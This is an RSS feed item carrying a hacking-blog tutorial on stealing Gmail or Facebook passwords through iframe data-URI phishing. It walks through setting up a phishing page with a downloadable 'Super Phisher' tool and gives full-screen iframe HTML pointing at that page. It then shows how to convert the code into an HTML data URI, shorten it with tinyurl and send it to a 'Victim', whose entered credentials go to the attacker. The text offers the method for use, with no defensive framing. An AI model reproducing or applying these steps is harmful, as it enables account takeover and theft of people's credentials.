				<content:encoded><![CDATA[<p><span style="color: #000000;">First of all download</span> <a href="http://www.mediafire.com/?g9qoq36h8pyyy3m"><b>Super Phisher</b></a><strong> </strong><span style="color: #000000;">and create a Phishing page</span><strong> (</strong><a href="http://www.hackingarticles.in/how-to-create-own-phishing-page/"><b>How to Create Phishing Page</b></a><b>)</b></p>
<p><img alt="" src="http://i2.wp.com/3.bp.blogspot.com/-quTs8eOmaTE/UXocSofBMZI/AAAAAAAAGGM/ron1IYK6Mcs/s1600/1.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">To get the URL of the phishing page upload the page on any webhost / localhost (XAMPP in my case). </span></p>
<p><span style="color: #000000;">&lt;style&gt; body { margin: 0; overflow: hidden; } &lt;/style&gt;</span></p>
<p><span style="color: #000000;">&lt;iframe src=&#8221;<strong>url link</strong>&#8221; height=&#8221;100%&#8221; width=&#8221;100%&#8221; border=&#8221;no&#8221; frameBorder=&#8221;0&#8243; scrolling=&#8221;auto&#8221; &gt;Iframe Failed&lt;/iframe&gt;</span></p>
<p><strong><span style="color: #800000;">Replace the URL link in the iframe code with the URL of the uploaded phishing page</span></strong></p>
<p><span style="color: #000000;">&lt;style&gt; body { margin: 0; overflow: hidden; } &lt;/style&gt;</span></p>
<p><span style="color: #000000;">&lt;iframe src=&#8221;<strong>http://localhost/gmail</strong>/&#8221; height=&#8221;100%&#8221; width=&#8221;100%&#8221; border=&#8221;no&#8221; frameBorder=&#8221;0&#8243; scrolling=&#8221;auto&#8221; &gt;Iframe Failed&lt;/iframe&gt;</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Now visit <strong>http://dopiaza.org/tools/datauri/</strong> , select Provide Text option in URL Generator page and pasting the modified exploit code (as shown above)</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Once the code has been pasted in the Text Area , click on Generate Data URL</span></p>
<p> <img alt="" src="http://i2.wp.com/4.bp.blogspot.com/-5AvXhTV4mSE/UXocetfJGxI/AAAAAAAAGGU/fcx_UZ7QBpk/s1600/2.jpg?resize=555%2C519" data-recalc-dims="1" /></p>
<p><img alt="" src="http://i0.wp.com/1.bp.blogspot.com/-6DlVc-Jx_Gk/UXoc6EO-CPI/AAAAAAAAGGc/IgKhARBC3vM/s1600/3.jpg?w=620" data-recalc-dims="1" /></p>
<p style="text-align: justify;"><span style="color: #000000;"><img alt="" src="http://i1.wp.com/4.bp.blogspot.com/-jOIfm6DDaO8/UXojhMyTJzI/AAAAAAAAGHc/km_T6HDAXVo/s1600/k.jpg?resize=614%2C91" data-recalc-dims="1" /><br />
</span></p>
<p><span style="color: #000000;">We will get the code as shown above after generating the URL.</span></p>
<p><span style="color: #000000;">In the code generated replce “<b>plain” </b>with<b> “html” </b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><img alt="" src="http://i0.wp.com/1.bp.blogspot.com/-p9pBPXB_Kys/UXojrHWywQI/AAAAAAAAGHk/f-cpbHEJAyA/s1600/k1.jpg?resize=545%2C81" data-recalc-dims="1" /><br />
</span></p>
<p><span style="color: #000000;">Convert the above URL code in short URL by using “<strong>www.tinyurl.com</strong>”</span></p>
<p><img alt="" src="http://i0.wp.com/1.bp.blogspot.com/-smR3I7tAXPo/UXodBHODA9I/AAAAAAAAGGk/96y6bisfNVM/s1600/4.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">Now send the converted URL to Victim</span></p>
<p><img alt="" src="http://i0.wp.com/2.bp.blogspot.com/-0enNNzKQ7KM/UXodIIOFBLI/AAAAAAAAGGs/AAbSdM4mKL0/s1600/5.jpg?resize=574%2C302" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">As soon the Victim will enter his credentials you will get the same</span></p>
<p><img alt="" src="http://i1.wp.com/1.bp.blogspot.com/-b1dZVqe9a1I/UXodXk_N27I/AAAAAAAAGG0/nRMi7OVkbFc/s1600/6.jpg?w=620" data-recalc-dims="1" /></p>
<p><strong>Reference URL: <a href="http://packetstormsecurity.com/files/121389/Iframe-URI-Phishing.html">http://packetstormsecurity.com/files/121389/Iframe-URI-Phishing.html</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
